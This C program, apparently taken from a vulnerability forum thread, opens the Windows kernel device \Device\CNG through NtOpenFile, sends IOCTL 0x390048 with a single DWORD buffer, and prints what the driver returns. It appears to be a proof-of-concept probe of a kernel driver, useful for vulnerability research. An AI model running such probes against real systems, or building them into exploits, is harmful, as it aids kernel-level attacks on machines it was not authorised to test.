// Source: http://www.binvul.com/viewthread.php?tid=508
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")
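/*
 * Opens the \Device\CNG device object through NtOpenFile, sends a single
 * DeviceIoControl request (control code 0x390048) with one DWORD used as
 * both input and output buffer, and prints the value the driver writes back.
 *
 * NtOpenFile is resolved from ntdll.dll at run time; RtlInitUnicodeString
 * is linked through the ntdll.lib import library named in the #pragma above.
 *
 * Returns 0 once the IOCTL has been attempted (whether or not it succeeded)
 * and -1 when NtOpenFile cannot be resolved or the device cannot be opened.
 * argc and argv are not used.
 */
int main(int argc, CHAR* argv[]) {
    typedef NTSTATUS (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle,
                                               IN ACCESS_MASK DesiredAccess,
                                               IN POBJECT_ATTRIBUTES ObjectAttributes,
                                               OUT PIO_STATUS_BLOCK IoStatusBlock,
                                               IN ULONG ShareAccess,
                                               IN ULONG OpenOptions);
    NT_OPEN_FILE NtOpenFileStruct;

    (void)argc;
    (void)argv;

    /* Explicit ANSI variant so the narrow literal does not depend on UNICODE. */
    HMODULE hModule = LoadLibraryA("ntdll.dll");
    if (hModule == NULL) {
        return -1;
    }

    NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile");
    if (NtOpenFileStruct == NULL) {
        /* return instead of exit(): <stdlib.h> is not included by this file. */
        return -1;
    }

    /* NT object-manager path of the device; not reachable via CreateFile as-is. */
    UNICODE_STRING filename;
    RtlInitUnicodeString(&filename, L"\\Device\\CNG");

    OBJECT_ATTRIBUTES obja;
    obja.Attributes = 0x40;               /* OBJ_CASE_INSENSITIVE */
    obja.ObjectName = &filename;
    /* Hard-coded rather than sizeof(obja); 0x18 is the 32-bit structure size. */
    obja.Length = 0x18;
    obja.RootDirectory = NULL;
    obja.SecurityDescriptor = NULL;
    obja.SecurityQualityOfService = NULL;

    IO_STATUS_BLOCK iostatusblock = {0};
    HANDLE hCNG = NULL;

    /*
     * 0x100001 = SYNCHRONIZE | FILE_READ_DATA
     * 7        = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE
     * 0x20     = FILE_SYNCHRONOUS_IO_NONALERT
     */
    NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20);
    if (!NT_SUCCESS(stat)) {
        printf("File could not be opened.\n");
        return -1;
    }
    printf("File successfully opened.\n");

    /*
     * One zero-initialised DWORD is passed as both the input and the output
     * buffer, so anything printed on success was written by the driver.
     * 0x390048 decodes (CTL_CODE layout) as device type 0x39, function 0x12,
     * METHOD_BUFFERED, FILE_ANY_ACCESS; the page does not say what the
     * request does.
     */
    DWORD dwBuffer = 0;
    DWORD dwCnt = 0;
    BOOL bRet = DeviceIoControl(hCNG, 0x390048, &dwBuffer, sizeof dwBuffer,
                                &dwBuffer, sizeof dwBuffer, &dwCnt, NULL);
    if (bRet == FALSE) {
        printf("[*]Send IOCTL fail!\n");
        /* DWORD is unsigned long: print with %lu rather than %d. */
        printf("[*]Error Code:%lu\n", GetLastError());
    } else {
        printf("[*]0x%08lx\n", dwBuffer);
    }

    CloseHandle(hCNG);

    /* Keeps the console window open until a key is pressed. */
    getchar();
    return 0;
}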